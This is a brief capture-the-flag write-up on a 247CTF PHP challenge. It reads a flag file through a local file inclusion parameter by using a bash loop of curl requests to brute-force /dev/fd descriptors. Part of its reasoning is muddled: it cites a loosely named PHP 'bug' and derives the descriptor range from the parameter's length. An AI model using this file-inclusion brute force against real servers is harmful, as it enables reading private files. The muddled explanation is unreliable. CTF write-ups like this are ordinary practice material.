We know that the flag is in /tmp/flag.txt
and we have to send a parameter named include
to the server with method GET to read a file.
PHP have a bug named Cannot open file descriptor streams, then we will brute force to find the flag.
https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/<i>
With 0 <= i <= 99, because include
‘s length is less than or equal to 10.
We use:
for i in $(seq 0 99); do echo; echo "Testing fd $i"; curl -s https://17ab3b9759789fcb.247ctf.com/?include=/dev/fd/$i | grep 247; done
The flag is printed when i = 10.